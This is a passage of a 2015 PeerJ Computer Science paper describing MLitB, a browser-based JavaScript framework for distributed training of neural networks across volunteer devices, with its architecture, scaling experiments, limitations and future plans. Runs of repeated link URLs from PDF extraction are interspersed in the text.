http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://www.w3.org/TR/XMLHttpRequest http://dx.doi.org/10.7717/peerj-cs.11 problems/projects simultaneously along with all clients’ connections. All processes within the master are event-driven, triggered by actions of the slave nodes. Calling the appropriate functions by slave nodes to the master node is handled by the router. The master must efficiently perform its tasks (data reallocation and distribution, reduce-steps) because the clients are idle awaiting new parameters before their next work cycle. New clients must also wait until the end of an iteration before joining a network. The MLitB network is dynamic and permits slave nodes to join and leave during processing. The master monitors its connections and is able to detect lost participants. When this occurs, data that was allocated to the lost client is re-allocated the remaining clients, if possible, otherwise it is marked as to be allocated. Data server The data server is a bespoke application intended to work with our neural network use-case model and can be thought of a lightweight replacement for a proper image database. The data server is an independent Node.js application that can, but does not necessarily live on the same machine. Users upload data in zip files before training begins; currently, the data server handles zipped image classification datasets (where sub-directory names define class labels). Data is then downloaded from the data server and zipped files are sent to clients using XHR and unzipped and processed locally. XHR is used instead of WebSockets because they communicate large zip-files more efficiently. A redundant cache of data is stored locally in the clients’ browser’s memory. For example, a client may store 10,000 data vectors, but at each iteration it may only have the computational power to process 100 data vectors in its scheduled iteration duration. The data server uses specialized JavaScript APIs unzip.js and redis-server. Clients Clients are browser connections from heterogeneous devices that visit the master server’s url. Clients interact through a UI worker, called a boss, and can create slave workers to perform various tasks (see Workers). The boss is the main worker running in a client’s browser. It manages the slave and image download worker and functions as a bridge between the downloader and slaves. A simple wrapper handles UI interactions, and provides input/output to the boss. Client bosses use a data worker to download data from the data server using XHR. The data worker and server communicate using XHR and pass zip files in both directions. The boss handles unzipping and decoding data for slaves that request data. Clients therefore require no software installation other than its native browser. Clients can contribute to any project hosted by the master server. Clients can trigger several events through the UI worker. These include adjusting hyper-parameters, adding data, and adding slave workers, etc. (Fig. 3). Most tasks are run in a separate Web Worker thread (including the boss), ensuring a non-blocking and responsive client UI. Data downloading is a special task that, via the boss and the data worker, uses XHR to download from the data server. Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 8/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 Figure 3 MLitB client workers. Each client connection to the master server initiates a UI worker, also known as a boss. For uploading data from a client to the data server and for downloading data from the data server to a client, a separate Web Worker called the data worker is used. Users can add slaves through the UI worker; each slave performs a separate task using a Web Worker. Icon made by Freepik from www. flaticon.com. Workers In Fig. 3 the tasks implemented using Web Worker threads are shown. At the highest-level is the client UI, with which the user interacts with ML problems and controls their slave workers. From the client UI, a user can create a new project, load a project from file, upload data to a project, or add slave workers for a project. Slaves can perform several tasks; most important is the trainer, which connects to an event loop of a ML project and contributes to its computation (i.e., its map step). Each slave worker communicates directly to the master server using Web Sockets. For the latter three tasks, the communication is mainly for sending requests for models parameters and receiving them. The training slave has more complicated behavior because it must download data then perform computation Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 9/24 https://peerj.com/computer-science/ http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://dx.doi.org/10.7717/peerj-cs.11 as part of the main event loop. To begin training, the user sets the slave task to train and selects start/restart. This will trigger a join event at the master server; model parameters and data will be downloaded and the slave will begin computation upon completion of the data download. The user can remove a slave at any time. Other slave tasks are tracking, which requires receiving model parameters from the master, and allows users to monitor statistics of the model on a dataset (e.g., classification error) or to execute the model (e.g., classify an image on a mobile device). Each slave worker communicates directly to the master server using Web Sockets. Events and software behavior The MLitB network is constructed as a master–slave relationship, with one server and multiple slave nodes (clients). The setup for computation is similar to a MapReduce network (Dean & Ghemawat, 2008); however, the master server performs many tasks during an iteration of the master event loop, including a reduce step, but also several other important tasks. The specific tasks will be dictated by events triggered by the client, such as requests for parameters, new client workers, removed/lost clients, etc. Our master event loop can be considered as a synchronized map-reduce algorithm with a user defined iteration duration T, where values of T may range from 1 to 30 s, depending on the size of the network and the problem. MLitB is not limited to a map-reduce paradigm and in fact we believe that our framework opens the door to peer-to-peer or gossip algorithms (Boyd et al., 2006). We are currently developing asynchronous algorithms to improve the scalability of MLitB. Master event loop The master event loop consists of five steps and is executed by the master server node as long there is at least one slave node connected. Each loop includes one map-reduce step, and runs for at least T seconds. The following steps are executed, in order: (a) New data uploading and allocation. (b) New client trainer initialization and data allocation. (c) Training workers reduce step. (d) Latency monitoring and data allocation adjustment. (e) Master broadcasts parameters. (a) New data uploading and allocation When a client boss uploads data, it directly communicates with the data server using XHR. Once the data server has uploaded the zip file, it sends the data indices and classification labels to the boss. The boss then registers the indices with the master server. Each data index is managed: MLitB stores an allocated index (the worker that is allocated the ID) and a cached index (the worker that has cached the ID). The master ensures that the data allocation is balanced amongst its clients. Once a data set is allocated on the master server, the master allocates indices and sends the set of IDs to workers. Workers can then request data from the boss, who in turn use its data downloader worker to download those worker Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 10/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 specific IDs from the data server. The data server sends a zipped file to the data downloader, which are then unzipped and processed by the boss (e.g., JPEG decoding for images). The zip file transfers are fast but the decoding can be slow. We therefore allow workers to begin computing before the entire dataset is downloaded and decoded, allowing projects to start training almost immediately while data gets cached in the background. (b) New client trainer initialization and data allocation When a client boss adds a new slave, a request to join the project is sent to the master. If there is unallocated data, a balanced fraction of the data is allocated to the new worker. If there is no unallocated data, a pie-cutter algorithm is used to remove allocated data from other clients and assign it to the new client. This prevents unnecessary data transfers. The new worker is sent a set of data IDs it will need to download from the client’s data worker. Once the data has been downloaded and put into the new worker’s cache, the master will then add the new worker to the computation performed at each iteration. The master server is immediately informed when a client or one of its workers is removed from the network.3 Because of this, it can manage the newly unallocated data (that were allocated to 3 If a user closes a client tab, the master will know immediately and take action. In the current implementation, if a user closes the master tab, all current connections are lost. the lost client). (c) Training workers’ reduce step The reduce step is completely problem specific. In our prototype, workers compute gradients with respect to model parameters over their allocated data vectors, and the reduce step sums over the gradients and updates the model parameters. (d) Latency monitoring and data allocation adjustment The interval T represents both the time of computation and the latency between the client and the master node. The synchronization is stochastic and adaptive. At each reduce step, the master node estimates the latency between the client and the master and informs the client worker how long it should run for. A client does not need to have a batch size because it just clocks its own computation and returns results at the end of its scheduled work time. Under this setting, it is possible to have mobile devices that compute only a few gradients per second and a powerful desktop machine that performs hundreds or thousands. This simple approach also allows the master to account for unexpected user activity: if the user’s device slows or has increased latency, the master will decrease the load on the device for the next iteration. Generally, devices with a cellular network connection communicate with longer delays than hardwired machines. In practice, this means the reduction step in the master node receives delayed responses from slave nodes, forcing it to run the reduction function after the slowest slave node (with largest latency) has returned. This is called asynchronous reduction callback delay. (e) Master broadcasts parameters An array of model parameters is broadcast to each clients’ boss worker using XHR; when the boss receives new parameters, they are given to each of its workers who then start another computation iteration. Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 11/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 ML use-case: deep neural networks The current version of the MLitB software is built around a pervasive ML use-case: deep neural networks (DNNs). DNNs are the current state-of-the-art prediction models for many tasks, including computer vision (Krizhevsky, Sutskever & Hinton, 2012; Lin, Chen & Yan, 2013), speech recognition (Hinton et al., 2012), and natural language processing and machine translation (Liu et al., 2014; Bahdanau, Cho & Bengio, 2014; Sutskever, Vinyals & Le, 2014). Our implementation only required superficial modifications to an existing JavaScript implementation (Karpathy, 2014) to fit into our network design. Scaling behavior of MLitB We performed an experiment to study the scaling behavior of MLitB prototype. Using up to 32 4-core workstation machines connected on a local area network using a single router, we trained a simple convolutional NN on the MNIST dataset for 100 iterations (with 4 seconds per iteration/synchronization event).4 The number of slave nodes doubled from 4 Slave node specifications (32 units): Intel Core i3-2120 3.3 GHz (dual-core); 4GB RAM; Windows 7 Enterprise x64; Google Chrome 35. Master node specifications (1 unit): Intel Xeon E5620 2.4 GHz (quad-core); 24 GB RAM; Ubuntu 10.04 LTS. NodeJS version: v0.10.28. The NN has a 28 × 28 input layer connected to 16 convolution filters (with pooling), followed by a fully connected output layer. one experiment to the next (i.e., 1,2,4,...,96). We are interested in the scaling behavior of two performance indicators: (1) power, measured in data vectors processed per second, and (2) latency in milliseconds between slaves and master node. Of secondary interest is the generalization performance on the MNIST test set. As a feasibility study of a distributed ML framework, we are most interested scaling power while minimizing latency effects during training, but we also want to ensure the correctness of the training algorithm. Since optimization using compiled JS and/or GPUs of the ML JavaScript library possible, but not our focus, we are less concerned with the power performance of a single slave node. Results for power and latency are shown in Fig. 4. Power increases linearly up to 64 slave nodes, at which point a large increase in latency limits additional power gains for new nodes. This is due to a single server reaching the limit of its capacity to process incoming gradients synchronously. Solutions include using multiple server processes, asynchronous updates, and partial gradient communication. Test error, as a function of the number of nodes is shown in Fig. 5 after 50 iterations (200 s) and 100 iterations (400 s); i.e., each point represents the same wall-clock computation time. This demonstrates the correctness of MLitB for a given model architecture and learning hyperparameters. Due to the data allocation policy that limits the data vector capacity of each node to 3,000 vectors, experiments with more nodes process more of the training set during the training procedure. For example, using only 1 slave node trains on 3/60 of the full training set. With 20 nodes, the network is training on the full dataset. This policy could easily be modified to include data refreshment when running with unallocated data. The primary latency issue is due to all clients simultaneously sending gradients to the server at the end of each iteration. Three simple scaling solutions are (1) increasing the number of master node processes that receive gradients (2) using asynchronous update rules (each slave computes for a random amount of time, then sends updates), reducing the load of any one master node process, and (3) partial communication of gradients (decreasing bandwidth). Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 12/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 Figure 4 Effects of scaling on power and latency. Power—measured as the number of data vectors processed per second—scales linearly until 64 nodes, when the increase in latency jumps. The ideal linear scaling is shown in grey. Figure 5 Effects of scaling on optimization Convergence of the NN is measured in terms of test error after 50 and 100 iterations. Each point represents approximately the same wall-clock time (200/400 s for 50 and 100 iterations, respectively). Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 13/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 Figure 6 CIFAR-10 project loaded in MLitB. Walk-through of MLitB prototype We briefly describe how MLitB works from a researcher’s point of view. Specification of neural network and training parameters Using a minimalist UI (not shown), the researcher can specify their neural network, for example they can add/remove layers of different types, and adjust regularization parameters (L1/L2/dropout) and learning rates. Alternatively, the researcher can load a previously saved neural network in JSON format (that may or may not have already been trained). Once a NN is specified (or loaded), it appears in the display, along with other neural networks also managed by the master node. By selecting a specific neural network, the researcher can then add workers and data (e.g., project cifar10 in Fig. 6). Specification of training data Image classification data is simple to upload using named directory structures for image labels. For example, for CIFAR10 all files in the “apple” subdirectory will be given label “ap- ple” once loaded (e.g., the image file /cifar10/apple/apple apple s 000022.png). The entire “cifar10” directory can be zipped and uploaded. MLitB processes JPEG and PNG formats. A test set can be uploaded in tracker mode. Training mode In the training mode, a training worker performs as many gradient computations as possible within the iteration duration T (i.e., during the map step of the main event loop). The total gradient and the number of gradients is sent to the master, which then in the reduce step computes a weighted average of gradients from all workers and takes a gradient step using AdaGrad (Duchi, Hazan & Singer, 2011). At the end of the main event loop, new neural network weights are sent via Web Sockets to both trainer workers (for the next Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 14/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 Figure 7 Tracking model (model execution). The label of a test image is predicted using the latest NN parameters. Users can execute a NN prediction using an image stored on their device or using their device’s camera. In this example, an image of a horse is correctly predicted with probability 0.687 (the class-conditional predictive probability). gradient computations) and to tracker workers (for computing statistics and executing the latest model). Tracking mode There are two possible functions in tracking mode: (1) executing the neural network on test data, and (2) monitoring classification error on an independent data set. For 1, users can predict class labels for images taken with a device’s camera or locally stored images. Users can also learn a new classification problem on the fly by taking a picture and giving it a new label; this is treated as a new data vector and a new output neuron is added dynamically to the neural network if the label is also new. Figure 7 shows a test image being classified by the cifar10 trained neural network. For 2, users create a statistics worker and can upload test images and track their error over time; after each complete evaluation of the test images, the latest neural network received from the master is used. Fig. 8 shows the error for cifar10 using a small test set for the first 600 parameter updates. Archiving trained neural network model The prototype does not include a research closure specification. However, it does provide easy archiving functionality. At any moment, users can download the entire model speci- fication and current parameter values in JSON format. Users can then share or initialize a new training session with the JSON object by uploading it during the model specification phase, which represents a high-level of reproducibility. Although the JSON object fully specifies the model, it does not include training or testing code. Despite this shortcoming, using a standard protocol is simple way of providing a lightweight archiving system. Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 15/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 Figure 8 Tracking mode (classification error). A test dataset can be loaded and its classification error rate tracked over iterations; here using a NN trained on CIFAR-10. Limitations of MLitB prototype In this section we briefly discuss the limitations of the current prototype; later in Section ‘Opportunities and Challenges’ we will discuss the challenges we face in scaling MLitB to a massive level. Our scaling experiment demonstrates that the MLitB prototype can accommodate up to 64 clients before latency significantly degrades its performance. Latency, however, is primarily affected by the length of an iteration and by size of the neural network. For longer iterations, latency will become a smaller portion of the main event loop. For very large neural networks, latency will increase due to bandwidth pressure. As discussed previously, the main computational efficiency loss is due to the synchro- nization requirement of the master event loop. This requirement causes the master server to be idle while the clients are computing and the clients to wait while the master processes all the gradients. As the size of the full gradients can be large (at least >1 MB for small neural networks), the network bandwidth is quickly saturated at the end of a computation iteration and during the parameter broadcast. By changing to an asynchronous model, the master can continuously process gradients and the bandwidth can be maximally utilized. By communicating partial gradients, further efficiency can be attained. We leave this for future work. There is a theoretical limit of 500 MB data storage per client (the viable memory of a web-browser). In our experience, the practical limit is closer to 100 MB at which point performance is lost due to memory management issues. We found that 1 MB/s bandwidth was achievable on a local network, which meant that it could handle images on MNIST and CIFAR-10 easily, but would stall for larger images. With respect to Deep Neural Networks, the data processing ability of a single node was limited (especially is one compared Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 16/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 to sophisticated GPU enables libraries (Bastien et al., 2012)). Although we were most interested in the scaling performance, we note that naive convolution implementations significantly slow performance. We found that reasonable sized images, up to 100 × 100 × 3 pixels, can be processed on mobile devices in less than a second without convolutions, but can take several seconds with convolutions, limiting its usefulness. In the future, near native or better implementations will be required for the convolutional layers. RELATED WORK MLitB has been influenced by a several different technologies and ideas presented by previous authors and from work in different specialization areas. We briefly summarize this related work below. Volunteer computing BOINC (Anderson, 2004) is an open-source software library used to set up a grid computing network, allowing anyone with a desktop computer connected to the internet to participate in computation; this is called public resource computing. Public resource or volunteer computing was popularized by SETI@Home (Anderson et al., 2002), a research project that analyzes radio signals from space in the search of signs of extraterrestrial intelligence. More recently, protein folding has emerged as significant success story (Lane et al., 2013). Hadoop (Shvachko et al., 2010) is an open-source software system for storing very large datasets and executing user application tasks on large networks of computers. MapReduce (Dean & Ghemawat, 2008) is a general solution for performing computation on large datasets using computer clusters. JavaScript applications In (Cushing et al., 2013) a network of distributed web-browsers called WeevilScout is used for complex computation (regular expression matching and binary tree modifications) using a JavaScript engine. It uses similar technology (Web Workers and Web Sockets) as MLitB. ConvNetJS (Karpathy, 2014) is a JavaScript implementation of a convolutional neural-network, developed primarily for educational purposes, which is capable of building diverse neural networks to run in a single web browser and trained using stochastic gradient descent; it can be seen as the non-distributed predecessor of MLitB. Distributed machine learning The most performant deep neural network models are trained with sophisticated scientific libraries written for GPUs (Bergstra et al., 2010; Jia et al., 2014; Collobert, Kavukcuoglu & Farabet, 2011) that provide orders of magnitude computational speed-ups compared to CPUs. Each implements some form of stochastic gradient descent (SGD) (Bottou, 2010) as the training algorithm. Most implementations are limited to running on the cores of a single machine and by extension the memory limitations of the GPU. Exceptionally, there are distributed deep learning algorithms that use a farm of GPUs (e.g., Downpour SGD (Dean et al., 2012)) and farms of commodity servers (e.g., COTS-HPS (Coates et al., 2013)). Other distributed ML algorithm research includes the parameter server model (Li Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 17/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 et al., 2014), parallelized SGD (Zinkevich et al., 2010), and distributed SGD (Ahn, Shahbaba & Welling, 2014). MLitB could potentially push commodity computing to the extreme using pre-existing devices, some of which may be GPU capable, with and without an organization’s existing computing infrastructure. As we discuss below, there are still many open research questions and opportunities for distributed ML algorithm research. OPPORTUNITIES AND CHALLENGES In tandem with our vision, there are several directions the next version of MLitB can take, both in terms of the library itself and the potential kinds of applications a ubiquitous ML framework like MLitB can offer. We first focus on the engineering and research challenges we have discovered during the development of our prototype, along with some we expect as the project grows. Second, we look at the opportunities MLitB provides, not only based on the research directions the challenges uncovered, but also novel application areas that are perfect fits for MLitB. In Section ‘Future MLitB Development’ we preview the next concrete steps in MLitB development. Challenges We have identified three keys engineering and research challenges that must be overcome for MLitB to achieve its vision of learning models a global scale. Memory limitations State-of-the-art Neural Network models have huge numbers of parameters. This prevents them from fitting onto mobile devices. There are two possible solutions to this problem. The first solution is to learn or use smaller neural networks. Smaller NN models have shown promise on image classification performance, in particular the Network in Network (Lin, Chen & Yan, 2013) model from the Caffe model zoo, is 16 MB, and outperforms AlexNet which is 256 MB (Jia et al., 2014). It is also possible to first train a deep neural network then use it to train a much smaller, shallow neural network (Ba & Caruana, 2014). Another solution is to distribute the NN (during training and prediction) across clients. An example of this approach is Downpour SGD (Dean et al., 2012). Communication overhead With large models, large of numbers of parameters are communicated regularly. This is a similar issue to memory limitation and could benefit from the same solutions. However, given a fixed bandwidth and asynchronous parameter updates, we can ask what parameter updates (from master to client) and which gradients (from client to master) should be communicated. An algorithm could transmit a random subset of the weight gradients, or send the most informative. In other words, given a fixed bandwidth budget, we want to maximize the information transferred per iteration. Performance efficiency Perhaps the biggest argument against scientific computing with JavaScript is its computation performance. We disagree that this should prevent the widespread adoption of browser-based, scientific computing because the goal of several groups to achieve native Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 18/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 performance in JavaScript (Chrome V8, 2014; asm.js, 2014) and GPU kernels are becoming part of existing web engines (e.g., WebCL by Kronos: www.khronos.org/webcl) and they can be seamlessly incorporated into existing JavaScript libraries, though they have yet to be written for ML. Opportunities Massively distributed learning algorithms The challenges just presented are obvious areas of future distributed machine learning research (and are currently being developed for the next version of MLitB). Perhaps more interesting is, at a higher level, that the MLitB vision raises novel questions about what it means to train models on a global scale. For instance, what does it mean for a model to be trained across a global internet of heterogeneous and unreliable devices? Is there a single model or a continuum of models that are consistent locally, but different from one region to another? How should a model adapt over long periods of time? These are largely untapped research areas for ML. Field research Moving data collection and predictive models onto mobile devices makes is easy to bring models into the field. Connecting users with mobile devices to powerful NN models can aid field research by bringing the predictive models to the field, e.g., for fast labeling and data gathering. For example, a pilot program of crop surveillance in Uganda currently uses bespoke computer vision models for detecting pestilence (insect eggs, leaf diseases, etc.) (Quinn, Leyton-Brown & Mwebaze, 2011). Projects like these could leverage publicly available, state-of-the-art computer vision models to bootstrap their field research. Privacy preserving computing and mobile health Our MLitB framework provides a natural platform for the development of real privacy- preserving application (Dwork, 2008) by naturally protecting user information contained on mobile devices, yet allowing the data to be used for valuable model development. The current version of MLitB does not provide privacy preserving algorithms such as (Han et al., 2010), but these could be easily incorporated into MLitB. It would therefore be possible for a collection of personal devices to collaboratively train machine learning models using sensitive data stored locally and with modified training algorithms that guarantee privacy. One could imagine, for example, using privately stored images of a skin disease to build a classifier based on large collection of disease exemplars, yet with the data always kept on each patient’s mobile device, thus never shared, and trained using privacy preserving algorithms. Green computing One of our main objectives was to provide simple, cheap, distributed computing capability with MLitB. Because MLitB runs with minimal software installation (in most cases requiring none), it is possible to use this framework for low-power consumption distributed computing. By using existing organizational resources running in low-energy states (dormant or near dormant) MLitB can wake the machines, perform some Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 19/24 https://peerj.com/computer-science/ http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://www.khronos.org/webcl http://dx.doi.org/10.7717/peerj-cs.11 computing cycles, and return them to their low-energy states. This is in stark contrast to a data center approach which has near constant, heavy energy usage (Natural Resources Defense Council, 2014). FUTURE MLITB DEVELOPMENT The next phases of development will focus on the following directions: a visual program- ming user interface for model configuration, development of a library of ML models and algorithms, development of performant scientific libraries in JavaScript with and without GPUs, and model archiving with the development of a research closure specification. Visual programming Many ML models are constructed as chains of processing modules. This lends itself to a visual programming paradigm, where the chains can be constructed by dragging and dropping modules together. This way models can be visualized and compared, dissected, etc. Algorithms are tightly coupled to the model and a visual representation of the model can allow interaction with the algorithm as it proceeds. For example, learning rates for each layer of a neural network can be adjusted while monitoring error rates (even turned off for certain layers), or training modules can be added to improve learning of hidden layers for very deep neural networks, as done in Szegedy et al. (2014). With a visual UI it would be easy to pull in other existing, pre-trained models, remove parts, and train on new data. For example, a researcher could start with a pre-trained image classifier, remove the last layer, and easily train a new image classifier, taking advantage of an existing, generalized image representation model. Machine learning library We currently have built a prototype around an existing JavaScript implementation of DNNs (Karpathy, 2014). In the near future we plan on implementing other models (e.g., la- tent Dirichlet allocation) and algorithms (e.g., distributed MCMC (Ahn, Shahbaba & Welling, 2014)). MLitB is agnostic to learning algorithms and therefore is a great platform for researching novel distributed learning algorithms. To do this, however, MLitB will need to completely separate machine learning model components from the MLitB network. At the moment, the prototype is closely tied to its neural network use-case. Once separated, it will be possible for external modules to be added by the open-source community. GPU implementations Implementation of GPU kernels can bring MLitB performance up to the level of current state-of-the-art scientific libraries such as Theano (Bergstra et al., 2010; Bastien et al., 2012) and Caffe (Jia et al., 2014), while retaining the advantages of using heterogeneous devices. For example, balancing computational loads during training is very simple in MLitB and any learning algorithm can be shared by GPU powered desktops and mobile devices. Smart phones could be part of the distributed computing process by permitting the training algorithms to use short bursts of GPU power for their calculations, and therefore limiting battery drain and user disruption. Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 20/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.11 Design of research closures MLitB can save and load JSON model configurations and parameters, allowing researchers to share and build upon other researchers’ work. However, it does not quite achieve our goal of a research closure where all aspects—code, configuration, parameters, etc—are saved into a single object. In addition to research closures, we hope to develop a model zoo, akin to Caffe’s for posting and sharing research. Finally, some kind of system for verifying models, like recomputation.org, would further strengthen the case for MLitB being truly reproducible (and provide backwards compatibility). CONCLUSION In this paper we have introduced MLitB: Machine Learning in the Browser, an alternative framework for ML research based entirely on using the browser as the computational engine. The MLitB vision is based upon the overarching objectives that provide ubiquitous ML capability to every computing device, cheap distributed computing, and reproducible research. The MLitB prototype is written entirely in JavaScript and makes extensive use of existing JavaScript libraries, including Node.js for servers, Web Workers for non-blocking computation, and Web Sockets for communication between clients and servers. We demonstrated the potential of MLitB on a ML use-case: Deep Neural Networks trained with distributed Stochastic Gradient Descent using heterogenous devices, including dedicated grid-computing resources and mobile devices, using the same interface and with no client-side software installation. Clients simply connect to the server and computing begins. This use-case has provided valuable information for future versions of MLitB, exposing both existing challenges and interesting research and application opportunities. We have also advocated for a framework which supports reproducible research; MLitB naturally provides this by allowing models and parameters to be saved to a single object which can be reloaded and used by other researchers immediately. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors acknowledge funding support from Amsterdam Data Science and computing resources from SurfSara. M Welling acknowledges support from Facebook, Google, and Yahoo. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: SurfSara. Facebook. Google. Yahoo. Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 21/24 https://peerj.com/computer-science/ file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org file:www.recomputation.org http://dx.doi.org/10.7717/peerj-cs.11 Competing Interests The authors declare there are no competing interests. Author Contributions • Edward Meeds conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • Remco Hendriks conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • Said Al Faraby conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work. • Magiel Bruntink and Max Welling wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding the deposition of related data: GitHub: github.com/software-engineering-amsterdam/MLitB. REFERENCES Ahn S, Shahbaba B, Welling M. 2014. Distributed stochastic gradient MCMC. In: Proceedings of the 31st international conference on machine learning (ICML-14), 1044–1052. Available at http:// www.ics.uci.edu/∼babaks/Site/Home files/icml2014 Ahn.pdf. Anderson DP. 2004. BOINC: a system for public-resource computing and storage. In: Proceedings of the workshop on grid computing. Piscataway: IEEE, 4–10. Anderson DP, Cobb J, Korpela E, Lebofsky M, Werthimer D. 2002. SETI@Home: an experiment in public- resource computing. Communications of the ACM 45(11):56–61 DOI 10.1145/581571.581573. asm.js. 2014. asm.js: an extraordinarily optimizable, low-level subset of JavaScript. Available at http://asmjs.org (accessed 26 November 2014). Ba J, Caruana R. 2014. Do deep nets really need to be deep? In: Advances in neural information processing systems, 2654–2662. Available at http://papers.nips.cc/paper/ 5484-do-deep-nets-really-need-to-be-deep. Bahdanau D, Cho K, Bengio Y. 2014. Neural machine translation by jointly learning to align and translate. ArXiv preprint. arXiv:1409.0473. Bastien F, Lamblin P, Pascanu R, Bergstra J, Goodfellow I, Bergeron A, Bouchard N, Warde-Farley D, Bengio Y. 2012. Theano: new features and speed improvements. ArXiv preprint. arXiv:1211.5590. Begoli E, Horey J. 2012. Design principles for effective knowledge discovery from big data. In: Software Architecture (WICSA) and European Conference on Software Architecture (ECSA), 2012 joint working IEEE/IFIP conference on. Piscataway: IEEE, 215–218. Bergstra J, Breuleux O, Bastien F, Lamblin P, Pascanu R, Desjardins G, Turian J, Warde-Farley D, Bengio Y. 2010. Theano: a CPU and GPU math expression compiler. In: Proceedings of the python for scientific computing conference (SciPy). Oral Presentation. Available at http://www.iro.umontreal.ca/∼lisa/pointeurs/theano scipy2010.pdf. Meeds et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.11 22/24 https://peerj.com/computer-science/ http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB http://www.github.com/software-engineering-amsterdam/MLitB 